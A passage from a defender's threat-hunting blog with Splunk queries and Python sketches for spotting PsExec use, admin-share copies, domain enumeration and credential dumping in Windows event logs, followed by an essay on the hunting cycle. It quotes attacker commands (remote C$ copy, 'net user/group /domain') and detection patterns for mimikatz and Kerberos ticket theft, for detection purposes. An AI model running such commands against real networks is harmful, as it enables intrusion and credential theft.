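    return {k: v["procs"] for k, v in buckets.items() if v["svc"] and v["procs"]}

# Hypothetical sample: service binary write plus cmd.exe in the same second.
events = [
    {"EventCode": 5145, "Share_Name": "\\\\HOST1\\ADMIN$",
     "Relative_Target_Name": "PSEXESVC.exe", "ComputerName": "HOST1", "_time": 50},
    {"EventCode": 4688, "New_Process_Name": "C:\\Windows\\System32\\cmd.exe",
     "ComputerName": "HOST1", "_time": 50},
]
print(find_psexec(events))  # {('HOST1', 50): ['C:\\Windows\\System32\\cmd.exe']}
```

Note the case-insensitive match on PSEXESVC.EXE: the service binary name survives even when the psexec client itself has been renamed on the source.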

Copying files from the destination machine back to the source will produce different logs than copying from the source to the destination.  FridayFun has used commands such as the following.

copy \\\c$\windows\system32\1.txt .\1.txt

This method is much like the first query with the exception of the Access Masks.  The following query can be used to identify this behavior.

sourcetype=wineventlog:security EventCode=5145 Object_Type=File Share_Name=*$ (Access_Mask=0x100081 OR Access_Mask=0x80 OR Access_Mask=0x120089)  |bucket span=1s _time |rex "(?<thingtype>(0x100081|0x80|0x120089))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Source_Address) AS Source_Address, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=3

For those that like dashboards, I created the following to show what the output would look like.

As a defender, I think far too often we are focused on singular events that will give us that "ah ha" moment.  Sure, there are some that may be a dead giveaway of a malicious actor operating in our environment, but singular alerts are often judged by their true to false positive ratio.  With the method I showed above I can look for specific behavior, regardless of noise, and bucket events into previously identified attacker activity.  When the number of unique events meets a certain value based on source, destination, or user, I can then raise an alarm.  The more behavior that I can identify and query for, the larger my web becomes.  I don’t know that I will ever be able to piece together an entire intrusion by the alerts I generate, but I at least want to make it extremely difficult for any adversary to operate freely in my environment.

I would love to hear any comments.  You can find me on Twitter at @jackcr.

Monday, January 30, 2017

Hunting: What does it look like?

It's been a while since I've posted anything, and I wanted to get this out.  Partly because of an article that I read that talks about how attackers may move laterally within your network.  The other reason is because I think it really shows what you can do with Windows event logs (provided you have certain logging enabled) to identify anomalous behavior.

We know that attackers will often use built-in operating system utilities to facilitate host/user enumeration and lateral movement (if you want to dig more into what I will be talking about, I would suggest starting here).  I have previously made the recommendation that if you have command line process auditing enabled to focus much attention on the system32/syswow64 directories.  Looking for rare or first seen command line arguments from processes that are spawned from these directories can, at times, point to malicious behavior when lateral movement is involved.  If attackers have brought tools in with them to facilitate enumeration or lateral movement, this method can become much more difficult as the command line arguments may be unknown and simply glossed over.  If we flip this around, though, and look at the effects of enumeration on the destination side, we may be able to spot what may have otherwise been missed.

I am a big advocate of looking for the same things multiple ways and in different log sources.  There are times where logging events fail due to network issues, application issues…  Having layers of coverage is a good idea, imho, and this includes trying to identify the same activity on both source and destination machines.

Now for the article, which you can read here:  The author does a good job of describing some of the tools and methods that may be employed by an attacker, but falls short when it comes to discussing how to find indications of this behavior.  Instead they make the statement "With an assumed-breach mindset, we assume the attacker has already breached the perimeter and is on the network. Unfortunately, this is when the adversary goes dark to the defender, as the attacker has already breached network defenses as well as antivirus."  If you have the necessary logging enabled, I don’t believe they need to go dark.

If we dive into what they describe they first talk about the “net user” and “net group” commands.  How might these look to a defender?

    net user administrator /domain
    Event Code: 4661
    Object Type: SAM_USER
    Object Name: S-1-5-21-*-500 (* represents domain)
    Access Mask: 0x2d 
Note: In my testing, users in the Domain Admins group will display a SID.  Other users will not.  The exceptions are the Guest and krbtgt accounts.  I would also pay attention to the krbtgt SID S-1-5-21-*-502.  I would think it would be very odd to see this, and it may indicate an attacker is intending to use Golden Tickets.

    net group “Domain Admins” /domain
    Event Code: 4661
    Object Type: SAM_GROUP
    Object Name: S-1-5-21-*-512
    Access Mask: 0x2d
Note: Also pay attention to the Enterprise Admins group with the SID of S-1-5-21-*-519
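If your tooling can't wildcard the domain portion of a SID, the RID checks from both notes above can be sketched as a small function.  The field value and labels here are illustrative, not tied to any particular SIEM:

```python
import re

# Well-known RIDs worth alerting on when enumerated via 4661 SAM access.
WATCHED_RIDS = {
    "500": "built-in Administrator",
    "502": "krbtgt (possible Golden Ticket prep)",
    "512": "Domain Admins",
    "519": "Enterprise Admins",
}

# Domain SIDs look like S-1-5-21-<domain>-<rid>; capture the trailing RID.
SID_RE = re.compile(r"^S-1-5-21-[\d-]+-(\d+)$")

def classify_sam_object(object_name):
    """Return a label when a 4661 Object Name ends in a watched RID."""
    m = SID_RE.match(object_name)
    return WATCHED_RIDS.get(m.group(1)) if m else None

print(classify_sam_object("S-1-5-21-1111-2222-3333-512"))  # Domain Admins
```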

The following can be used to identify PowerSploit’s Get-NetSession, Get-NetShare, netsess.exe and net view.  The net view command may look something like "net view \\".

    Event Code: 5145
    Relative Target Name: srvsvc
    Share Name: IPC$
    Access_Mask: 0x12019f
Note: These events may be very loud.  I would suggest looking for a single source creating srvsvc pipes on multiple machines within a specified time frame.  This may be indicative of enumeration activity.
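That suggestion can be sketched as a count of distinct destinations per source inside a window.  The threshold and window below are illustrative placeholders to tune for your environment, and the field names are assumptions:

```python
from collections import defaultdict

def enumeration_sources(events, threshold=10, span=300):
    """Return source addresses that touched the srvsvc pipe on at least
    `threshold` distinct hosts inside a `span`-second window."""
    seen = defaultdict(set)
    for e in events:
        if (e.get("EventCode") == 5145
                and e.get("Share_Name", "").endswith("IPC$")
                and e.get("Relative_Target_Name") == "srvsvc"):
            seen[(e["Source_Address"], int(e["_time"]) // span)].add(e["ComputerName"])
    return [src for (src, _), hosts in seen.items() if len(hosts) >= threshold]

# Hypothetical sample: one source hitting ten hosts in five minutes.
events = [
    {"EventCode": 5145, "Share_Name": "\\\\h\\IPC$", "Relative_Target_Name": "srvsvc",
     "Source_Address": "10.0.0.5", "ComputerName": "HOST%d" % i, "_time": 100}
    for i in range(10)
]
print(enumeration_sources(events))  # ['10.0.0.5']
```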

The article goes on to talk about the use of mimikatz and the use of hashes and kerberos tickets.  

One method I have found to identify an attacker obtaining hashes through lsadump is to look for the following.  I have also found this to be a pretty accurate indicator and would suggest, if you have these logs, to monitor for this event.
    Event Code: 4656
    Object Type: SAM_DOMAIN
    Process Name: lsass.exe
    Access Mask: 0x705
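Because all four fields must line up, this indicator reduces to a simple predicate.  A sketch, assuming events parsed into dicts with these field names:

```python
def looks_like_lsadump(event):
    """Match the 4656 lsadump indicator described above: SAM_DOMAIN access
    by lsass.exe with access mask 0x705."""
    return (event.get("EventCode") == 4656
            and event.get("Object_Type") == "SAM_DOMAIN"
            and event.get("Process_Name", "").lower().endswith("lsass.exe")
            and event.get("Access_Mask") == "0x705")

print(looks_like_lsadump({"EventCode": 4656, "Object_Type": "SAM_DOMAIN",
                          "Process_Name": "C:\\Windows\\System32\\lsass.exe",
                          "Access_Mask": "0x705"}))  # True
```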

For Kerberos ticket theft, I have not found an accurate way to identify this in the event logs, but when executed with mimikatz there will be files written with the .kirbi extension.  If an attacker were using WCE, there would be two files created named wce_ccache and wce_krbtkts.  These files can obviously be renamed, but if you have the ability to monitor file creations I would recommend watching for all of these names to hopefully catch them when they are dropped on the file system, before renaming.
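A file-creation monitor checking for those names can be sketched as a matcher like the following (how you receive file-creation events is environment-specific and not shown):

```python
import fnmatch

# Default artifact names: mimikatz ticket exports (.kirbi) and WCE dumps.
TICKET_PATTERNS = ["*.kirbi", "wce_ccache", "wce_krbtkts"]

def is_ticket_artifact(filename):
    """True when a newly created file matches a known ticket-theft name."""
    name = filename.lower()
    return any(fnmatch.fnmatch(name, p) for p in TICKET_PATTERNS)

print(is_ticket_artifact("ticket.kirbi"))  # True
print(is_ticket_artifact("notes.txt"))     # False
```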

With respect to the article, I would like to thank Microsoft for putting it out.  I believe more should release what attackers are doing so that people can focus attention on what is being used.  I see a lot of threat hunting providers say you need it, but they don’t share any of what they look for or why they look for it.  I hope those that do this choose to share more in the future.

I would love to hear what others are doing with regards to hunting for and detecting the above.  Finding innovative ways to hunt for bad guys is what I’m passionate about so please share in the comments section. 

Wednesday, November 23, 2016

The Hunting Cycle and Measuring Success

I typically write about the technical aspects of hunting, but wanted to do something different here as a result of a conversation I had a while back, which was spurred from this tweet:  While I strongly agree that hunters should be hunting and not building PowerPoint decks or driving projects, I also don’t believe many functions in business have an open-ended budget, and at some point you will need to justify your work, or even your value, to the company.

So how do we measure success?  Before answering that question, I believe it’s important to define the various stages of hunting (from my perspective).  By defining the process, I believe it will be much easier to see where we can point to areas of success, regardless of whether you come away empty-handed on a hunt.

From my experience, here are the different stages of a typical hunting cycle.

Define:  In my opinion, hunts are more successful when focused on a task.  One way to do this is to define a general topic and then list the ways that an attacker may take advantage of that topic.  As an example, let's say that we want to focus a hunt on persistence mechanisms.  What are the different ways that persistence can be maintained?
  1. Services
  2. Scheduled tasks
  3. Load order hijacking
  4. Run keys
  5. Startup folder
  6. Valid credentials for externally facing devices
  7. VPN access 

Research:  Based on the above topics, do we know enough about each one to be able to successfully identify what malicious instances may look like?  Are there other methods that can be used to identify the above topics other than what we already know about?  In a lot of cases we are aware that attackers are using $method, but we simply don’t know enough about the topic to be able to look for $method as an indicator of malicious activity.  It’s ok if you don’t know (I’m in that boat a lot) and the researching / learning part is actually kind of fun.    

Availability:  Once we have our list assembled, do we have the data available to be able to find what we are looking for?  If not, is it something that we have the ability to collect?

Develop:  Here is the big one.  Can we assemble queries that will reliably identify the activity while keeping the volume and false positive rates very low?  If these queries will be transitioned to another team to operationalize, then maintaining analyst confidence in the data output is very important.  This confidence can be undermined by the quality and quantity of data being presented to them.

Automate:  Queries that have a high likelihood of being transitioned or those that may be candidates for further development should be scheduled for routine runs.  Seeing the output on a regular basis may give you insight into further improvement.

Knowledge Transfer:  When going through this process you have likely learned more about the topic than when you first began.  Little nuances in data may be a strong indicator that something is amiss and may be the entire reason for the query.  Don’t assume that the person sitting next to you will know the reasoning behind the data.  Document each hunt that will be transitioned and include your thought process behind each one. 

Operationalize:  If this data will be consumed by another team, provide recommendations on scheduling, alerting, and actions related to positive results.  Remember that this team will need to consume it into their existing processes, but you likely have the most experience behind the query and it may be good practice to give them insight into your expertise with it.  It’s also a good idea to create a feedback loop where modifications or enhancements can be requested or proposed.

Track:  These hunts may not initially prove to be valuable, but over time they may show themselves to be very effective at identifying malicious behavior.  Being able to track the good and the bad is important from a team perspective.  It may give you insight into areas that need improvement from a methodology or data standpoint.  You may also find areas where you are doing well and can toot your horn for impacting an adversary's ability to operate in your environment.

So the next question is: how do we measure success?  With all of the work that goes into a single hunt, I don’t think the only measurement is whether you find an intrusion during the above process.  Sure, that’s the ultimate goal, but if that’s what your existence hinges on, then I feel bad for you.  Some things to look at that can show the value of all the work that you are doing are:

  1. Number of incidents by severity
  2. Number of compromised hosts by severity
  3. Dwell time of any incidents discovered
  4. Number of detection gaps filled
  5. Logging gaps identified and corrected
  6. Vulnerabilities identified
  7. Insecure practices identified and corrected
  8. Number of hunts transitioned
  9. False positive rate of transitioned hunts
  10. Any new visibility gained

Threat hunting can have a very positive impact on the security posture of a company and being able to show this value is important.   Of course we all want to find that massive intrusion, but there is a lot that goes into this so don’t sell yourself short when asked to justify what you do for your company!